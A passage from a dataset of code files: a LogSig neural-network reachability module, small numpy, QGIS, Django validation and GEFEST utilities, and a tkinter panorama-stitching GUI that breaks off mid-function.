np.vstack((C21, C22, C23))\n            d2 = np.vstack((d21, d22, d23))\n        else:\n            C2 = np.empty((0, nv+1))\n            d2 = np.empty((0, 1))\n\n        # C3, d3, l< 0 and u > 0, x > 0 or x < 0\n        # y is concave for x in [l, 0] and convex for x\n        # in [0, u]\n        # split can be done here\n        map1 = np.argwhere((l.flatten() < 0) & (u.flatten() > 0)).flatten()\n        if len(map1):\n            a = yl[map1]\n            b = yu[map1]\n            da = dyl[map1]\n            db = dyu[map1]\n\n            dmin = np.minimum(da, db)\n            # over-approximation constraints\n            # constraint 1: y >= min(y'(l), y'(u)) * (x - l) + y(l)\n            # constraint 2: y <= min(y'(l), y'(u)) * (x - u) + y(u)\n            # constraint 3: y <= g2 * x + y2\n            # constraint 4: y >= g1 * x + y1\n\n            # constraint 1: y >= min(y'(l), y'(u)) * (x - l) + y(l)\n            C31 = np.hstack((np.multiply(dmin, I.V[map1, 1:nv]), -V2[map1, :]))\n            d31 = np.multiply(-dmin, I.V[map1, 0]-l[map1]) - a\n            # constraint 2: y <= min(y'(l), y'(u)) * (x - u) + y(u)\n            C32 = np.hstack((np.multiply(-dmin, I.V[map1, 1:nv]), V2[map1, :]))\n            d32 = np.multiply(dmin, I.V[map1, 0]-u[map1]) + b\n\n            dmin = np.minimum(da, db)\n            y1 = dmin*(-l[map1]) + a\n            y2 = dmin*(-u[map1]) + b\n            g2 = (y2 - a)/(-l[map1])\n            g1 = (y1 - b)/(-u[map1])\n\n            # print('l: ', l[map1])\n            # print('u: ', [map1])\n            # print('y1: ', y1)\n            # print('y2: ', y2)\n            # print('g1: ', g1)\n            # print('g2: ', g2)\n\n\n            # constraint 3: y <= g2 * x + y2\n            C33 = np.hstack((np.multiply(-g2,I.V[map1, 1:nv]), V2[map1, :]))\n            d33 = np.multiply(g2, I.V[map1, 0]) + y2\n            # constraint 4: y >= g1 * x + y1\n            C34 = np.hstack((np.multiply(g1,I.V[map1, 1:nv]), -V2[map1, :]))\n            d34 = np.multiply(-g1, I.V[map1, 0]) - y1\n\n            # print('C31: \\n', C31)\n            # print('C32: \\n', C32)\n            # print('C33: \\n', C33)\n            # print('C34: \\n', C34)\n            # print('d31: \\n', d31)\n            # print('d32: \\n', d32)\n            # print('d33: \\n', d33)\n            # print('d34: \\n', d34)\n            C3 = np.vstack((C31, C32, C33, C34))\n            d3 = np.vstack((d31, d32, d33, d34))\n            # print('C3: \\n', C3)\n            # print('d3: \\n', d3)\n        else:\n            # C3 = np.array([])\n            # d3 = np.array([])\n            C3 = np.empty((0, nv+1))\n            d3 = np.empty((0, 1))\n\n        # print('C1: \\n', C1)\n        # print('C2: \\n', C2)\n        # print('C3: \\n', C3)\n        # print('d1: \\n', d1)\n        # print('d2: \\n', d2)\n        # print('d3: \\n', d3)\n        new_C = np.vstack((C0, C1, C2, C3))\n        new_d = np.vstack((d0, d1, d2, d3))\n\n        # print('new_C: \\n', new_C)\n        # print('new_d: \\n', new_d)\n\n        # print('I.predicate_lb: ', I.predicate_lb)\n        # print('I.predicate_ub: ', I.predicate_ub)\n        # print('yl[map2]: ', yl[map2.flatten()])\n        # print('yu[map2]: ', yu[map2.T])\n        new_pred_lb = np.vstack((I.predicate_lb, yl[map2.flatten()]))\n        new_pred_ub = np.vstack((I.predicate_ub, yu[map2.flatten()]))\n\n        return Star(new_V, new_C, new_d, new_pred_lb, new_pred_ub)\n\n#------------------check if this function is working--------------------------------------------\n    # def relaxedMultiStepLogSig_NoSplit(I, relaxFactor = 0, disp_opt = '', lp_solver = 'gurobi'):\n    #     # @I: input star set\n    #     # @relaxFactor: for relaxed approx-star method\n    #     # @dis_opt; display option = '' or 'display'\n\n    #     # @l: l = min(x[index]), lower bound at neuron x[index]\n    #     # @u: u = min(x[index]), upper bound at neuron x[index]\n    #     # @yl: = logsig(l); output of logsig at lower bound\n    #     # @yu: = logsig(u); output of logsig at upper bound\n    #     # @dyl: derivative of LogSig at the lower bound\n    #     # @dyu: derivative of LogSig at the upper bound\n\n\n    def reach_rstar_approx(I):\n        # @I: input RStar set\n        # return: output RStar set\n        from engine.set.rstar import RStar\n        \n        assert isinstance(I, RStar), 'error: input set is not a RStar 
set'\n\n # LogSig.multiLogSig_rstar(I)\n\n D_L = I.D_L\n D_U = I.D_U\n lb = I.lb\n ub = I.ub\n n = len(D_L) - 1\n\n l = lb[n]\n u = ub[n]\n\n y_l = LogSig.evaluate(l)\n y_u = LogSig.evaluate(u)\n dy_l = (y_l * (1 - y_l.T)).diagonal().reshape(-1,1)\n dy_u = (y_u * (1 - y_u.T)).diagonal().reshape(-1,1)\n\n # create new matrices for lower and uppper polyhedral constraints and bounds\n D_L.append(np.zeros((I.dim, I.dim + 1)))\n D_U.append(np.zeros((I.dim, I.dim + 1)))\n lb.append(np.zeros((I.dim, 1)))\n ub.append(np.zeros((I.dim, 1)))\n RS = RStar(I.V, I.C, I.d, I.predicate_lb, I.predicate_ub, D_L, D_U, lb, ub, I.iter)\n\n for i in range(I.dim):\n RS = LogSig.stepLogSig_rstar(RS, i, l[i], u[i], y_l[i], y_u[i], dy_l[i], dy_u[i])\n return RS\n\n def stepLogSig_rstar(I, index, l, u, y_l, y_u, dy_l, dy_u):\n # @I: rstar-input set\n # @index: index of neuron performing stepReach\n # @l: l = min(x[index]), lower bound at neuron x[index] \n # @u: u = max(x[index]), upper bound at neuron x[index]\n # @y_l: = logsig(l); output of logsig at lower bound\n # @y_u: = logsig(u); output of logsig at upper bound\n # @dy_l: derivative of LogSig at the lower bound\n # @dy_u: derivative of LogSig at the upper bound\n # return: RStar output set\n from engine.set.rstar import RStar\n\n assert isinstance(I, RStar), 'error: input set is not a RStar set'\n \n D_L = I.D_L\n D_U = I.D_U\n lb = I.lb\n ub = I.ub\n n = len(D_L) - 1\n\n if l == u:\n new_V = I.V\n new_V[index, :] = 0\n new_V[index, 0] = y_l\n\n L = np.zeros((1, I.dim + 1))\n L[index + 1] = y_l\n D_L[n][index, :] = L\n\n U = np.zeros((1, I.dim + 1))\n U[index + 1] = y_l\n D_U[n][index, :] = U\n\n lb[n][index] = y_l\n ub[n][index] = y_u\n\n return RStar(new_V, I.C, I.d, I.predicate_lb, I.predicate_ub, D_L, D_U, lb, ub, I.iter)\n else:\n # print('I: \\n', I)\n # print('I.V: \\n', I.V)\n # print(' np.zeros((I.dim, 1)): \\n', np.zeros((I.dim, 1)))\n # print('I.C: \\n', I.C)\n # print('np.zeros((I.C.shape[0], 1)): \\n', np.zeros((I.C.shape[0], 1)))\n new_V = np.column_stack((I.V, np.zeros((I.dim, 1))))\n new_V[index, :] = 0\n new_V[index, -1] = 1\n\n C0 = np.column_stack((I.C, np.zeros((I.C.shape[0], 1))))\n d0 = I.d\n\n if l >= 0:\n a = (y_u - y_l)/(u - l)\n\n # constraint 1: y[index] >= y(l) + a * (x[index] - l)\n L = np.zeros(I.dim + 1).T\n L[0] = y_l - a * l\n L[index + 1] = a\n D_L[n][index, :] = L\n\n C1 = np.column_stack((a*I.V[index, 1:], -1))\n d1 = -y_l - a * (I.V[index, 0] - l)\n\n # constraint 2: y[index] <= y(u) + y'(u) * (x[index] - u)\n U = np.zeros(I.dim + 1).T\n U[0] = y_l - dy_u * u\n U[index + 1] = dy_u\n D_U[n][index, :] = U\n\n C2 = np.column_stack((-dy_u*I.V[index, 1:], 1))\n d2 = y_u + dy_u * (I.V[index, 0] - u)\n elif u <= 0:\n a = (y_u - y_l)/(u - l)\n\n # constraint 1: y[index] >= y(l) + y'(l) * (x[index] - l)\n L = np.zeros(I.dim + 1).T\n L[0] = y_l - dy_l * l\n L[index + 1] = dy_l\n D_L[n][index, :] = L\n\n C1 = np.column_stack((dy_l*I.V[index, 1:], -1))\n d1 = -y_l - dy_l * (I.V[index, 0] - l)\n\n # constraint 2: y[index] <= y(l) + a * (x[index] - l)\n U = np.zeros(I.dim + 1).T\n U[0] = y_l - a * l\n U[index + 1] = a\n D_U[n][index, :] = U\n \n C2 = np.column_stack((-a * I.V[index, 1:], 1))\n d2 = y_l + a * (I.V[index, 0] - l)\n else:\n da = min(dy_l, dy_u)\n\n # constraint 1: y[index] >= y(l) + da * (x[index] - l)\n L = np.zeros(I.dim + 1).T\n L[0] = y_l - da * l\n L[index + 1] = da\n D_L[n][index, :] = L\n \n C1 = np.column_stack((da*I.V[index, 1:], -1))\n d1 = -y_l - da * (I.V[index, 0] - l)\n\n # constraint 2: y[index] <= y(u) + 
lamda' * (x[index] - u)\n U = np.zeros(I.dim + 1).T\n U[0] = y_u - da * u\n U[index + 1] = da\n D_U[n][index, :] = U\n\n C2 = np.column_stack((-da*I.V[index, 1:], 1))\n d2 = y_u + da * (I.V[index, 0] - u)\n\n\n lb[n][index] = y_l\n ub[n][index] = y_u\n\n new_C = np.row_stack((C0, C1, C2))\n new_d = np.row_stack((d0, d1, d2))\n\n new_pred_lb = np.vstack((I.predicate_lb, y_l)) \n new_pred_ub = np.vstack((I.predicate_ub, y_u))\n\n return RStar(new_V, new_C, new_d, new_pred_lb, new_pred_ub, D_L, D_U, lb, ub, I.iter)\n\n # def multistepLogSig_rstar(I):\n # # @I: input RStar set\n # # return: output RStar set\n # from engine.set.rstar import RStar\n \n # assert isinstance(I, RStar), 'error: input set is not a RStar set'\n\n # N = I.dim\n # nVar = I.V.shape[1]\n\n # D_L = I.D_L\n # D_U = I.D_U\n # lb = I.lb\n # ub = I.ub\n # n = len(D_L) - 1\n\n # l = lb[n]\n # u = ub[n]\n\n # y_l = LogSig.evaluate(l)\n # y_u = LogSig.evaluate(u)\n # dy_l = (y_l * (1 - y_l.T)).diagonal().reshape(-1,1)\n # dy_u = (y_u * (1 - y_u.T)).diagonal().reshape(-1,1)\n\n # # create new matrices for lower and uppper polyhedral constraints and bounds\n # D_L.append(np.zeros((I.dim, I.dim + 1)))\n # D_U.append(np.zeros((I.dim, I.dim + 1)))\n # lb.append(np.zeros((I.dim, 1)))\n # ub.append(np.zeros((I.dim, 1)))\n\n # # l ~= u\n # map2 = np.argwhere(l.flatten() != u.flatten())\n # m = len(map2)\n # V2 = np.zeros((N,m))\n # for i in range(m):\n # V2[map2[i], i] = 1\n\n # # new basis matrix\n # new_V = np.hstack((np.zeros((N, I.nVar+1)), V2))\n\n # # l == u\n # map1 = np.argwhere(l.flatten() == u.flatten())\n # if len(map1):\n # yl1 = y_l[map1]\n # new_V[map1, 0] = yl1\n # new_V[map1, 1:nVar+1+m] = 0\n\n\n # # add new constraints\n \n # # C0, d0\n # n = I.C.shape[0]\n # C0 = np.hstack((I.C, np.zeros((n,m))))\n # d0 = I.d\n\n # nv = nVar+1\n\n # # C1, d1, x >= 0\n # # constraint 1: y >= y(l) + a * (x- l)\n # # constraint 2: y <= y(u) + y'(u) * (x- u)\n # map1 = np.argwhere((l.flatten() >= 0) & (l.flatten() != u.flatten()))\n # if len(map1):\n\n\n\n # a = (y_u - y_l)/(u - l)\n\n # # constraint 1: y[index] >= y(l) + a * (x[index] - l)\n # L = np.zeros(I.dim + 1).T\n # L[0] = y_l - a * l\n # L[index + 1] = a\n # D_L[n][index, :] = L\n\n # C1 = np.column_stack((a*I.V[index, 1:], -1))\n # d1 = -y_l - a * (I.V[index, 0] - l)\n\n # # constraint 2: y[index] <= y(u) + y'(u) * (x[index] - u)\n # U = np.zeros(I.dim + 1).T\n # U[0] = y_l - dy_u * u\n # U[index + 1] = dy_u\n # D_U[n][index, :] = U\n\n # C2 = np.column_stack((-dy_u*I.V[index, 1:], 1))\n # d2 = y_u + dy_u * (I.V[index, 0] - u) \n # else:\n # C1 = np.empty((0, nv+1))\n # d1 = np.empty((0, 1))\n\n # # C2, d2, x <= 0\n\n\n # # C3, d3, l< 0 and u > 0, x > 0 or x < 0\n\n\n # RS = RStar(I.V, I.C, I.d, D_L, D_U, lb, ub, I.iter)\n\n # for i in range(I.dim):\n # RS = LogSig.stepLogSig_rstar(RS, i, l[i], u[i], y_l[i], y_u[i], dy_l[i], dy_u[i])\n # return RS\n\n\n\n # return\n\n #-------------------------------- over-approximate reachability analysis with zonotope -----------------------------------#\n # rechability analysis with zonotope\n def reach_zono_approx(I):\n # @I: input zono\n # return: Z: output zono\n \n # method: approximate hyperbolic tangent function by a zonotope:\n # reference: Fast and Effective Robustness Certification,\n # Gagandeep Singh, NIPS, 2018\n from engine.set.zono import Zono\n\n assert isinstance(I, Zono), 'error: input set is not a Zono'\n\n B = I.getBox()\n lb = B.lb\n ub = B.ub\n print('lb: \\n', lb)\n print('ub: \\n', ub)\n y_lb = LogSig.evaluate(lb)\n y_ub 
= LogSig.evaluate(ub)\n dy_lb = y_lb * (1 - y_lb)\n dy_ub = y_ub * (1 - y_ub)\n\n G = np.hstack((dy_lb, dy_ub))\n gamma_mat = np.matrix(np.diagflat(G.min(1)))\n mu1 = 0.5 * (y_ub + y_lb - gamma_mat * (ub + lb))\n mu2 = 0.5 * (y_ub - y_lb - gamma_mat * (ub - lb))\n Z1 = I.affineMap(gamma_mat, mu1)\n new_V = np.diagflat(mu2)\n\n V = np.hstack((Z1.V, new_V))\n return Zono(Z1.c, V)\n\n#------------------check if this function is working--------------------------------------------\n # dealing with multiple inputs in parallel\n # def reach_zono_approx_multipleInputs(I, parallel = ''):\n\n\n #-------------------------------- over-approximate reachability analysis with abstract domain -----------------------------------#\n def stepLogSig_absdom(I, index, l, u, y_l, y_u, dy_l, dy_u):\n # @I: input star set\n # @index: index of the neuron\n # @l: l = min(x[index]); lower bound at neuron x[index]\n # @u: u = min(x[index]); upper bound at neuron x[index]\n # @y_l: y_l = logsig(l); output of logsig at lower bound\n # @y_u: y_u = logsig(u); output of logsig at upper bound\n # return: output star set\n from engine.set.star import Star\n\n if l == u:\n new_V = I.V\n new_V[index, :] = 0\n new_V[index, 0] = y_l\n return Star(new_V, I.C, I.predicate_lb, I.predicate_ub)\n\n elif l >= 0:\n # y is convex when x >= 0\n # constraint 1: y <= y'(u) * (x - u) + y(u)\n # constraint 2: y >= (y(u) - y(l)) * (x - l) / (u - l) + y(l)\n\n n = I.nVar + 1\n # over-approximation constraints\n # constraint 1: y <= y'(u) * (x - u) + y(u)\n C1 = np.column_stack((-dy_u*I.V[index, 1:n], 1))\n d1 = dy_u * I.V[index, 0] - dy_u*u + y_u\n # constraint 2: y >= (y(u) - y(l)) * (x - l) / (u - l) + y(l)\n a = (y_u - y_l) / (u - l)\n C2 = np.column_stack((a*I.V[index, 1:n], -1))\n d2 = a*l - y_l - a*I.V[index, 0]\n\n m = I.C.shape[0]\n C0 = np.column_stack((I.C, np.zeros((m, 1))))\n d0 = I.d\n new_C = np.row_stack((C0, C1, C2))\n new_d = np.row_stack((d0, d1, d2))\n new_V = np.column_stack((I.V, np.zeros((I.dim, 1))))\n new_V[index, :] = np.zeros((1, n+1))\n new_V[index, n] = 1\n\n # update predicate bound\n new_predicate_lb = np.row_stack((I.predicate_lb, y_l))\n new_predicate_ub = np.row_stack((I.predicate_ub, y_u))\n return Star(new_V, new_C, new_d, new_predicate_lb, new_predicate_ub)\n \n elif u <= 0:\n # y is concave when x <= 0\n # constraint 1: y >= y'(l) * (x - l) + y(l)\n # constraint 2: y <= (y(u) - y(l)) * (x - l) / (u - l) + y(l)\n\n n = I.nVar + 1\n # over-approximation constraints\n # constraint 1: y >= y'(l) * (x - l) + y(l)\n C1 = np.column_stack((dy_l*I.V[index, 1:n], -1))\n d1 = -dy_l * I.V[index, 0] + dy_l*l - y_l\n # constraint 2: y <= (y(u) - y(l)) * (x - l) / (u - l) + y(l)\n a = (y_u - y_l)/(u - l)\n C2 = np.column_stack((-a*I.V[index, 1:n], 1)) \n d2 = -a*l + y_l + a*I.V[index, 0]\n\n m = I.C.shape[0]\n C0 = np.column_stack((I.C, np.zeros((m, 1))))\n d0 = I.d\n new_C = np.row_stack((C0, C1, C2))\n new_d = np.row_stack((d0, d1, d2))\n new_V = np.column_stack((I.V, np.zeros((I.dim, 1))))\n new_V[index, :] = np.zeros((1, n+1))\n new_V[index, n] = 1\n\n # update predicate bound\n new_predicate_lb = np.row_stack((I.predicate_lb, y_l))\n new_predicate_ub = np.row_stack((I.predicate_ub, y_u))\n return Star(new_V, new_C, new_d, new_predicate_lb, new_predicate_ub)\n\n elif l < 0 and u > 0:\n # over-approximation constraints \n # constraint 1: y >= y'(l) * (x - l) + y(l)\n # constraint 2: y <= y'(u) * (x - u) + y(u)\n\n n = I.nVar + 1\n\n dy_min = min(dy_l, dy_u)\n # constraint 1: y >= y'(l) * (x - l) + y(l)\n C1 = 
np.column_stack((dy_min*I.V[index, 1:n], -1))\n            d1 = -dy_min * I.V[index, 0] + dy_min*l - y_l\n            # constraint 2: y <= y'(u) * (x - u) + y(u)\n            C2 = np.column_stack((-dy_min*I.V[index, 1:n], 1))\n            d2 = dy_min * I.V[index, 0] - dy_min*u + y_u\n\n            m = I.C.shape[0]\n            C0 = np.column_stack((I.C, np.zeros((m, 1))))\n            d0 = I.d\n            new_C = np.row_stack((C0, C1, C2))\n            new_d = np.row_stack((d0, d1, d2))\n            new_V = np.column_stack((I.V, np.zeros((I.dim, 1))))\n            new_V[index, :] = np.zeros((1, n+1))\n            new_V[index, n] = 1\n\n            # update predicate bound\n            new_predicate_lb = np.row_stack((I.predicate_lb, y_l))\n            new_predicate_ub = np.row_stack((I.predicate_ub, y_u))\n            return Star(new_V, new_C, new_d, new_predicate_lb, new_predicate_ub)\n\n    # reachability analysis with abstract domain\n    def reach_absdom_approx(I):\n        # @I: input star set\n        # return: output star set\n\n        # reference: An abstract domain for certifying neural networks. Proceedings of the ACM on Programming Languages,\n        # Gagandeep Singh, POPL, 2019\n        from engine.set.star import Star\n\n        assert isinstance(I, Star), 'error: input set is not a Star'\n\n        [l, u] = I.estimateRanges()\n\n        y_l = LogSig.evaluate(l)\n        y_u = LogSig.evaluate(u)\n        dy_l = (y_l * (1 - y_l.T)).diagonal().reshape(-1,1)\n        dy_u = (y_u * (1 - y_u.T)).diagonal().reshape(-1,1)\n\n        n = I.dim\n        S = I\n        for i in range(n):\n            S = LogSig.stepLogSig_absdom(S, i, l[i], u[i], y_l[i], y_u[i], dy_l[i], dy_u[i])\n        return S\n\n    # main function for reachability analysis\n    def reach(I, # an input star set\n              method, # 'approx-star', 'approx-zono', or 'abs-dom'\n              option = '', # = 'parallel' or '' using parallel computation or not\n              relaxFactor = 0, # for relaxed approx-star method \n              disp_opt = '', \n              lp_solver = 'gurobi'):\n\n        if method == 'approx-star': # over-approximate analysis using star\n            return LogSig.reach_star_approx(I, method, relaxFactor, disp_opt, lp_solver)\n        elif method == 'approx-rstar':\n            return LogSig.reach_rstar_approx(I)\n        elif method == 'approx-zono': # over-approximate analysis using zonotope\n            return LogSig.reach_zono_approx(I)\n        elif method == 'abs-dom': # over-approximate analysis using abstract-domain method of star\n            return LogSig.reach_absdom_approx(I)\n        else:\n            raise Exception('error: unknown or unsupported reachability method for layer with LogSig activation function')","repo_name":"V2A2/StarV_temp","sub_path":"engine/nn/funcs/logsig/logsig.py","file_name":"logsig.py","file_ext":"py","file_size_in_byte":25978,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"30473378492","text":"import numpy as np\n\nmatrix = np.array([\n    [1,2,4],\n    [0,1,-1],\n    [2,0,-4],\n    [3,-5,1]\n])\n\nprices = np.array([50,10,12])\n\nprint(\"considering the matrix\\n\" + np.array2string(matrix))\nprint(\"at prices\", prices)\npayoff_one_unit = matrix @ prices\nprint(\"leads to payoff per units\", payoff_one_unit)\ntasks_to_cancel = payoff_one_unit < 0\nprint(\"leads to cancel at\", tasks_to_cancel)\n\nmatrix[tasks_to_cancel,] = 0\nprint(\"yields matrix\\n\" + np.array2string(matrix))\n","repo_name":"johannesmarti/pytrade","sub_path":"snipplets/cancel_tasks.py","file_name":"cancel_tasks.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30639329929","text":"from qgis.core import (QgsTask, QgsMessageLog, Qgis)\nfrom .createdbconnection import createDbConnection\n\nclass QueryTask(QgsTask):\n    def __init__(self, connParams, queries):\n        
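# Editor's note, added comment not present in the upstream source: this\n        # QgsTask subclass opens one DB connection up front; run() then executes\n        # each SQL string from 'queries' in order, reporting progress per query\n        # and rolling back and closing the connection if any statement fails.\n        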
super().__init__('Suoritetaan laskentaa', QgsTask.CanCancel)\n self.exception = None\n self.conn = None\n self.queries = queries\n try:\n self.conn = createDbConnection(connParams)\n self.cur = self.conn.cursor()\n except Exception as e:\n self.exception = e\n\n def run(self):\n if self.exception:\n return False\n\n i = 0\n for query in self.queries:\n self.setProgress(i / len(self.queries) * 100)\n i += 1\n if self.isCanceled():\n self.exception = 'Laskenta keskeytetty'\n return False\n try:\n self.cur.execute(query)\n except Exception as e:\n self.exception = e\n self.conn.rollback()\n self.conn.close()\n return False\n self.conn.commit()\n self.conn.close()\n return True\n\n def finished(self, result):\n if not result:\n QgsMessageLog.logMessage('Laskentavirhe: ' + str(self.exception), 'YKRTool', Qgis.Critical)\n # raise self.exception\n self.cancel()\n","repo_name":"GispoCoding/assessclimateimpact","sub_path":"ykr_tool_tasks.py","file_name":"ykr_tool_tasks.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4055870343","text":"import re\n\n\ndef mobnum_Validation(form, model):\n data = form['mobile_number'].value()\n x = re.search(\"^((\\+){1}91){1}[1-9]{1}[0-9]{9}$\", str(data))\n if not x:\n return False\n\n\ndef mobnum_exist_Validation(form, model):\n data = form['mobile_number'].value()\n if model.objects.filter(mobile_number=data).exists():\n return False\n\n\ndef email_Validation(form, model):\n data = form['email'].value()\n x = re.search(\"^[a-zA-Z0-9+_.-]+@[a-zA-Z0-9.-]+$\", str(data))\n if not x:\n return False\n\n\ndef email_exist_Validation(form, model):\n data = form['email'].value()\n data = str(data)\n if model.objects.filter(email=data).exists():\n return False\n\n\ndef vehicleNum_Validation(form, model):\n data = form['vehicle_registration_no'].value()\n x = re.search(\"^[A-Z]{2}[ -][0-9]{1,2}(?: [A-Z])?(?: [A-Z]*)? 
[0-9]{4}$\", str(data)) ##############\"^[A-Z]{2}[0-9]{2}[A-Z]{2}[0-9]{4}$\n if not x:\n return False\n\ndef drivingLicNum_Validation(form, model):\n data = form['driving_lic_number'].value()\n if str(data) != \"\":\n x = re.search(\"^(([A-Z]{2}[0-9]{2})( )|([A-Z]{2}-[0-9]{2}))((19|20)[0-9][0-9])[0-9]{7}$\", str(data))\n if not x:\n return False\n\n\ndef RCBookNum_Validation(form, model):\n data = form['rc_book_no'].value()\n print(data)\n if str(data) != \"\":\n x = re.search(\"^[0-9]*$\", str(data))\n if not x:\n return False\n\ndef vehicleNum_exist_Validation(form, model):\n data = form['vehicle_registration_no'].value()\n if model.objects.filter(vehicle_registration_no=data).exists():\n return False\n\ndef drivingLicNum_exist__Validation(form, model):\n data = form['driving_lic_number'].value()\n if model.objects.filter(driving_lic_number=data).exists():\n return False\n\ndef RCBookNum_exist__Validation(form, model):\n data = form['rc_book_no'].value()\n if model.objects.filter(rc_book_no=data).exists():\n return False\n\n# def password_Validation(form, model):\n# data = form['password'].value()\n# x = re.search(\"(?=.*\\d)(?=.*[a-z])(?=.*[A-Z])(?=.*[a-zA-Z])$\", str(data))\n# if not x:\n# return False\n\n\ndef password_exist_Validation(form, model):\n data = form['password'].value()\n if model.objects.filter(password=data).exists():\n return False\n\n\ndef age_Validation(form, model):\n data = form['age'].value()\n if str(data) != \"\" or not str(data).__contains__(\"Please enter age \"):\n if not len(data) <= 2 :\n return False\n\n\ndef name_Validation(form, model):\n data = form['name'].value()\n print(data)\n if str(data) != \"\":\n x = re.search(\"^[a-zA-Z]+$\", str(data))\n if not x:\n return False\n\n\ndef aadhar_Validation(form, model):\n data = form['aadhar_num'].value()\n print(data)\n if str(data) != \"\":\n x = re.search(\"^\\d{4}\\d{4}\\d{4}$\", str(data))\n if not x:\n # \"Please enter valid aadhar number\"\n return False\n\ndef soc_exist(form, model):\n data = form['name'].value()\n if model.objects.filter(name=data).exists():\n return False\n\ndef zone_exist(form, model):\n data = form['slot_name'].value()\n if model.objects.filter(slot_name=data).exists():\n return False\n\n\n","repo_name":"deegosai/parkingzone","sub_path":"ParkZone/AdminPanel_Validations.py","file_name":"AdminPanel_Validations.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12055198659","text":"from gefest.core.geometry.datastructs.structure import Structure\nfrom gefest.core.opt.objective.objective import Objective\nfrom gefest.core.utils import where\nfrom gefest.core.utils.parallel_manager import BaseParallelDispatcher\n\n\nclass ObjectivesEvaluator:\n \"\"\"Implements objecives evaluation procedure.\"\"\"\n\n def __init__(\n self,\n objectives: list[Objective],\n n_jobs=None,\n ) -> None:\n self.objectives = objectives\n if n_jobs in (0, 1):\n self._pm = None\n else:\n self._pm = BaseParallelDispatcher(n_jobs)\n\n def __call__(\n self,\n pop: list[Structure],\n **kwargs,\n ) -> list[Structure]:\n \"\"\"Calls objectives evaluation.\"\"\"\n return self.set_pop_objectives(pop=pop)\n\n def set_pop_objectives(\n self,\n pop: list[Structure],\n ) -> list[Structure]:\n \"\"\"Evaluates objectives for whole population.\"\"\"\n idxs_to_eval = where(pop, lambda ind: len(ind.fitness) == 0)\n individuals_to_eval = [pop[idx] for idx in idxs_to_eval]\n if self._pm:\n evaluated_individuals = 
self._pm.exec_parallel(\n func=self.eval_objectives,\n arguments=[(ind, self.objectives) for ind in individuals_to_eval],\n use=True,\n flatten=False,\n )\n for idx, evaluated_ind in zip(idxs_to_eval, evaluated_individuals):\n pop[idx] = evaluated_ind\n else:\n for idx in where(pop, lambda ind: len(ind.fitness) == 0):\n pop[idx] = self.eval_objectives(pop[idx], self.objectives)\n\n return sorted(pop, key=lambda x: x.fitness)\n\n def eval_objectives(self, ind: Structure, objectives) -> Structure:\n \"\"\"Evaluates objectives.\"\"\"\n ind.fitness = [obj(ind) for obj in objectives]\n return ind\n","repo_name":"aimclub/GEFEST","sub_path":"gefest/core/opt/objective/objective_eval.py","file_name":"objective_eval.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"53"} +{"seq_id":"12999743696","text":"import cv2\r\nimport os\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nimport subprocess\r\nimport webbrowser\r\nimport sys\r\nfrom PIL import Image\r\nfrom matplotlib import pyplot as plt\r\nimport pano_conv\r\n# import time\r\n\r\nFILEBROWSER_PATH = 'nautilus'\r\nimput_img_folder = \"\"\r\ndone = 10101\r\n\r\nwindow = Tk()\r\nwindow.geometry('920x720')\r\nwindow.title(\"Pano Now\")\r\nwindow.config(bg=\"black\")\r\n\r\nLabel(window, text=\"Pano Now\", font=(\"Arial Bold\", 55), bg=\"black\", fg=\"#DDDDDD\").place(relx=0.5, rely=0.21, anchor=\"center\")\r\n\r\ndef close():\r\n sys.exit()\r\n\r\ndef pro():\r\n webbrowser.open('https://github.com/MJLNSN/Pano_convertor')\r\n\r\ndef imgfileselect():\r\n global imput_img_folder\r\n open_file = filedialog.askdirectory()\r\n imput_img_folder = open_file\r\n\r\nicon2 = PhotoImage(file='imp/folder.png')\r\nicon22 = icon2.subsample(9, 12)\r\nbt22 = Button(window, text=\" Select a Folder \", image=icon22, font=(\"Arial Bold\", 20), compound=LEFT, command=imgfileselect)\r\nbt22.place(relx=0.5, rely=0.50, anchor=\"center\")\r\n\r\nicon_close = PhotoImage(file='imp/close.png')\r\nicon_close2 = icon_close.subsample(9, 12)\r\nbt_close = Button(window, image=icon_close2, relief=FLAT, command=close, bg='black')\r\nbt_close.place(relx=0.9, rely=0.01)\r\n\r\nicon_help = PhotoImage(file='imp/help.png')\r\nicon_help2 = icon_help.subsample(9, 12)\r\nbt_help = Button(window, image=icon_help2, relief=FLAT, command=pro, bg='black')\r\nbt_help.place(relx=0.01, rely=0.01)\r\n\r\nlabell = Label(window, text=\"\", bg=\"black\")\r\n\r\ndef success(done):\r\n global imput_img_folder\r\n if done == 1:\r\n labell.configure(text=\"Successful! 
Please check the folder output!!!\", fg=\"green\", bg=\"#FCFFE7\", borderwidth=2, relief=\"raised\")\r\n        labell.place(relx=0.5, rely=0.9, anchor=\"center\")\r\n        window.update()\r\n        labell.after(7000, lambda: labell.place_forget())\r\n    elif done == 0:\r\n        labell.configure(text=\"Process cannot be completed\", fg=\"red\", bg=\"#FCFFE7\", borderwidth=2, relief=\"raised\")\r\n        labell.place(relx=0.5, rely=0.9, anchor=\"center\")\r\n\r\ndef output_open():\r\n    outop = \"output\"\r\n    subprocess.run([FILEBROWSER_PATH, outop])\r\n\r\ndef open_cv():\r\n    global imput_img_folder\r\n    global done\r\n    global Images\r\n    folder = imput_img_folder\r\n    if imput_img_folder == \"\":\r\n        labell.configure(text=\"Error: Please select a folder which contains several input images\", fg=\"red\", bg=\"#FCFFE7\", borderwidth=2, relief=\"raised\")\r\n        return\r\n    else:\r\n        print(\"input images' location:\")\r\n        print(imput_img_folder)\r\n        labell.configure()\r\n\r\n    path = imput_img_folder\r\n    Images = []\r\n    mylist = os.listdir(path)\r\n    print(\"input images list:\")\r\n    print(mylist)\r\n    for imgn in mylist:\r\n        curimg = cv2.imread(path + '/' + imgn)\r\n        curimg = cv2.resize(curimg, (0, 0), None, 0.5, 0.5)\r\n        Images.append(curimg)\r\n    status, result = pano_conv.converter(Images)\r\n\r\n    if status == 1:\r\n        cv2.imwrite('output/pano_out.png', result)\r\n        print(\"done\")\r\n        done = 